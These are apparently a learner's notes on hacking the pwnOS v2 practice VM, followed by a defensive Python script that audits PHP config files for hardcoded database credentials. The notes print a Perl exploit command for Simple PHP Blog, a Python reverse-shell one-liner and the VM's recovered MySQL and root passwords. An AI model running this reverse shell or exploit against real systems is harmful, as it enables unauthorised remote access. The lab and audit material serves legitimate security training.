Walkthru
A. http://defsecurityjam.blogspot.co.uk/2015/07/pwnos-version-2-walkthrough.html [reading source page, Simple PHP Blog Perl exploit, Python reverse shell using one-liner, looking around]
b. https://blog.g0tmi1k.com/2012/09/pwnos-2-php-web-application/ [Metasploit using PHP Blog exploit]
c. http://netsec.ws/?p=430 [Burp Suite, SQL proxy]
d. https://blog.g0tmi1k.com/2012/09/pwnos-2-sql-injection/ [SQL injection, UNION. Very good explanation of the process of what is being done. Didn't try cmds]
e. https://www.youtube.com/watch?v=ytzZfI27ueU [SQL injection, sqlmap read file and upload reverse shell using sqlmap]
f. https://ub3rsec.github.io/pages/2016/pwnosv2-sqli.html [SQL injection, UNION using Burp. Very good. It lists all the email field values that we are passing and modifying through Burp Suite proxy/intercept. One could enter those UNION statements in the email field, but in this case the field truncates and removes the later part of the UNION statement, which is why we have to use Burp to enter the UNION statement. If the field didn't truncate, we could just enter those in the email field. The first 2 UNION statements could be entered in the email field directly.]
Notes:
1. Scan http and 22
2. Was able to log in to login.php using SQL injection, but not much info.
3. Also has /blog, but was unable to log in.
4. I decided to take a closer look at the source of the /blog page. I found that the underlying app was Simple PHP Blog 0.4.0.
4a. Let's see if we can find any vulnerabilities or exploits associated with Simple PHP Blog 0.4.0.
4b. The exploitdb had a couple of exploits that fit the bill, one Metasploit module as well as the Perl-based exploit that I decided to go with.
root@kali:~/pwnos2# perl 1191.pl -h http://10.10.10.100/blog -e 2
4c. Walkthru A shows reset pwd, which worked but wasn't used, and uploading a PHP reverse shell, which didn't work. I was able to upload the PHP reverse shell using the cmd.php=wget... and could see it under /blog/images, but wasn't able to get a reverse connection. Was getting the following message when I clicked on the PHP file in the browser: "WARNING: Failed to daemonise. This is quite common and not fatal. Connection refused (111)". Tried other ports such as 80, 443 and 1234, but it didn't work, so I used a different reverse shell from the cheat sheet. Went through the list and was able to make the PYTHON shell work. It also worked on other ports, 4444 and 443.
5. Python: This was tested under Linux / Python 2.7:[source:http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet]
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
6. The file named mysqli_connect.php had some MySQL DB credentials in it.
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
7. We all know about the likelihood of password reuse, so I attempted to try what I found both inside and outside the database. Unfortunately it didn't work out for me. I spent several hours running local privilege escalation exploits, Linux privilege vulnerability scripts, etc., until I stumbled across a separate file also named mysqli_connect.php located in the /var directory. This file had separate credentials which worked for the MySQL instance. I decided to pillage the DB a bit.
cat mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
8. After spawning a terminal session, su with the password "root@ISIntS" and we are root.
9. Walkthru A includes some additional SQL/select connection commands.
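The root cause of steps 6 to 8 is a configuration hygiene problem on the target: two copies of mysqli_connect.php with different credentials, a web application connecting to MySQL as root, and a database password that was also the OS root password. The following audit script is an added example written for this page (it is not code from the VM, the walkthroughs above, or any of their authors). It parses the DEFINE (...) constants in the same style as the files shown above, flags hardcoded secrets and privileged database users, and reports duplicate config copies whose passwords have drifted apart. The file paths, constant names and password values in the sample input are constructed for the demonstration.

```python
import re
from typing import Dict, List

# Matches PHP constant definitions of the form  DEFINE ('NAME', 'value');
# (the style used in the mysqli_connect.php files shown above). Case-insensitive
# on DEFINE, tolerant of spacing, and accepts either quote style.
DEFINE_RE = re.compile(
    r"""define\s*\(\s*(['"])(?P<name>[A-Z0-9_]+)\1\s*,\s*(['"])(?P<value>.*?)\3\s*\)\s*;""",
    re.IGNORECASE,
)

# Constant names that hold secrets (constructed list; extend per application).
SECRET_NAMES = {"DB_PASSWORD", "DB_PASS", "DB_PWD"}
# Database accounts a web application should never connect as.
PRIVILEGED_USERS = {"root"}


def parse_defines(php_source: str) -> Dict[str, str]:
    """Return {CONSTANT: value} for every quoted DEFINE(...) in a PHP source string.
    Only string literals are captured: a value such as getenv('DB_PASSWORD') does not
    match, which is exactly the non-hardcoded case the audit should not flag."""
    return {m.group("name"): m.group("value") for m in DEFINE_RE.finditer(php_source)}


def audit_config(path: str, php_source: str) -> List[str]:
    """Return findings for a single config file."""
    defines = parse_defines(php_source)
    findings = []
    for name, value in defines.items():
        if name in SECRET_NAMES and value:
            findings.append(f"{path}: hardcoded secret in {name}")
    user = defines.get("DB_USER")
    if user in PRIVILEGED_USERS:
        findings.append(f"{path}: application connects as privileged DB user '{user}'")
    return findings


def audit_tree(files: Dict[str, str]) -> List[str]:
    """Audit several config files (path -> content) and cross-check files that share
    a basename: a second copy with a different password is credential drift, and any
    extra copy is one more place a secret sits on disk."""
    findings = []
    by_basename: Dict[str, list] = {}
    for path, src in files.items():
        findings.extend(audit_config(path, src))
        base = path.rsplit("/", 1)[-1]
        by_basename.setdefault(base, []).append((path, parse_defines(src)))
    for base, copies in by_basename.items():
        if len(copies) < 2:
            continue
        passwords = {d.get("DB_PASSWORD") for _, d in copies}
        paths = ", ".join(p for p, _ in copies)
        if len(passwords) > 1:
            findings.append(f"{base}: {len(copies)} copies with different DB_PASSWORD values ({paths})")
        else:
            findings.append(f"{base}: {len(copies)} identical credential copies ({paths})")
    return findings


# Constructed sample input: a web-root copy, a stale copy elsewhere on disk with a
# different password, and a cleanly written config that reads its secret from the
# environment and uses a low-privilege account.
SAMPLE_WEBROOT = """<?php
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'example-pass-1');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'webapp_db');
"""
SAMPLE_VAR = """<?php
define('DB_USER', 'root');
define('DB_PASSWORD', "example-pass-2");
define('DB_HOST', 'localhost');
define('DB_NAME', 'webapp_db');
"""
SAMPLE_GOOD = """<?php
DEFINE ('DB_USER', 'webapp_ro');
DEFINE ('DB_PASSWORD', getenv('DB_PASSWORD'));
DEFINE ('DB_HOST', 'localhost');
"""
SAMPLE_FILES = {
    "/var/www/mysqli_connect.php": SAMPLE_WEBROOT,  # hypothetical path
    "/var/mysqli_connect.php": SAMPLE_VAR,          # hypothetical path
    "/etc/app/db.php": SAMPLE_GOOD,                 # hypothetical path
}

if __name__ == "__main__":
    for finding in audit_tree(SAMPLE_FILES):
        print(finding)
```

On a real host you would feed audit_tree with the contents of every *.php file under the web root and the other locations the page shows a copy in (/var here), and treat a "different DB_PASSWORD values" finding as a prompt to delete the stale copy and rotate the credential; the "privileged DB user" finding is the cue to create a least-privilege account for the application so that a leaked config no longer hands out the database root password.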